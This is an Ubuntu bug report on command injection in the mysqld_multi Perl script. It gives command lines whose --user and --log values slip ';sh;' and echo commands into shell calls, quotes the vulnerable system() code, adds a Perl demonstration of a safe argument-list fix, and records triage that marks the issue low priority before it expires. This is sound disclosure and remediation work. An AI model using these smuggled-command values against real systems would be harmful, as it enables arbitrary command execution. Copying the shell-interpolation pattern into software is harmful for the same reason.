command injections in mysqld_multi

Bug #782298 reported by Emanuel Bronshtein
This bug affects 1 person
Affects: mysql-5.1 (Ubuntu)
Status: Expired
Importance: Wishlist
Assigned to: Unassigned
Milestone:

Bug Description

Binary package hint: mysql-server-5.1

/usr/bin/mysqld_multi has command injection bugs.

Test case:

    emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent > /tmp/mysqld_multi_example

1) report option:

    emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" report --silent
    mysqld_multi log file version 2.16; run: Fri May 13 19:41:26 2011
    Reporting MySQL servers
    /usr/bin/mysqladmin: connect to server at 'localhost' failed
    error: 'Access denied for user 'User'@'localhost' (using password: NO)'
    $

2) start option:

    emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --log="/tmp/mlog;echo SystemInj;sh;echo 1" start
    SystemInj
    $

3) stop option:

    emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" stop --silent
    mysqld_multi log file version 2.16; run: Fri May 13 19:42:59 2011
    Stopping MySQL servers
    /usr/bin/mysqladmin: connect to server at 'localhost' failed
    error: 'Access denied for user 'User'@'localhost' (using password: NO)'
    $

The bug can be found at:

1) sub report_mysqlds

    $com= get_mysqladmin_options($i, @groups);
    $com.= " ping >> /dev/null 2>&1";
    system($com);

2) sub start_mysqlds()

    $com.= $tmp;
    $com.= " >> $opt_log 2>&1" if (!$opt_no_log);
    $com.= " &";
    system($com);

3) sub stop_mysqlds()

    $com= get_mysqladmin_options($i, @groups);
    $com.= " shutdown";
    $com.= " >> $opt_log 2>&1" if (!$opt_no_log);
    $com.= " &";
    system($com);
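
One way to avoid the pattern in the three subs above, as an added example that is not part of the report or of mysqld_multi: pass an argument list so no shell parses the option values, and open the log file from Perl instead of interpolating it into a redirect. `/bin/echo` stands in for mysqladmin, `run_no_shell` and `slurp` are hypothetical helpers, and the `--user` and `--log` values are constructed.

```perl
#!/usr/bin/perl
# Added example, not mysqld_multi's own code. /bin/echo stands in for
# mysqladmin; the --user and --log values are constructed.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Hypothetical helper: run @argv with no shell, appending stdout/stderr to
# $log. It waits for the child instead of backgrounding it with "&".
sub run_no_shell {
    my ($log, @argv) = @_;
    my $pid = fork();
    die "fork failed: $!" unless defined $pid;
    if ($pid == 0) {
        # Three-argument open treats $log purely as a file name.
        open(STDOUT, '>>', $log)     or exit 126;
        open(STDERR, '>&', \*STDOUT) or exit 126;
        exec { $argv[0] } @argv      or exit 127;
    }
    waitpid($pid, 0);
    return $? >> 8;
}

# Hypothetical helper: return a file's contents, or '' if it is missing.
sub slurp {
    my ($file) = @_;
    open(my $fh, '<', $file) or return '';
    local $/;
    my $text = <$fh>;
    return defined $text ? $text : '';
}

my $dir  = tempdir(CLEANUP => 1);
my $user = 'User; echo INJECTED';        # constructed --user value
my $log  = "$dir/mlog; echo INJECTED";   # constructed --log value

# Pattern from the report: one interpolated string. Perl passes it to
# /bin/sh -c, so the text after ';' runs as a second command.
my $com = "/bin/echo --user=$user >> $dir/vuln.log 2>&1";
system($com);

# Same call as an argument list: each value is exactly one argv element.
my $rc = run_no_shell($log, '/bin/echo', "--user=$user");

print "string form wrote: ", slurp("$dir/vuln.log");
print "list form wrote:   ", slurp($log), "exit status $rc\n";
```

With the string form, the first log receives only the output of the injected `echo`; with the list form, the log is a file literally named `mlog; echo INJECTED` that holds the untouched `--user` value.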

Changed in mysql-5.1 (Ubuntu):
importance: Undecided → High
tags: added: security
Dave Walker (davewalker)
security vulnerability: no → yes
Ursula Junque (ursinha)
tags: added: server
Marc Deslauriers (mdeslaur) wrote :

While this should get fixed, I don't really see a security issue here, unless an attacker can somehow control the parameters that mysqld_multi uses without them getting specified by the user on the command line.

Dave Walker (davewalker) wrote :

Thanks for your input, Marc. Based on this, I'm dropping the priority and marking incomplete pending further information.

@Emanuel, please can you provide further information on how this might cause an issue?

Thanks.

Changed in mysql-5.1 (Ubuntu):
status: New → Incomplete
importance: High → Wishlist
Launchpad Janitor (janitor) wrote :

[Expired for mysql-5.1 (Ubuntu) because there has been no activity for 60 days.]

Changed in mysql-5.1 (Ubuntu):
status: Incomplete → Expired
Emanuel Bronshtein (e3amn2l) wrote :

Yes, if some other program (GUI, server-side scripts, etc.) uses user-supplied data as input to the "mysqld_multi" command in vulnerable operations, it will be a security issue.

This report contains Public Security information  
Everyone can see this security related information.
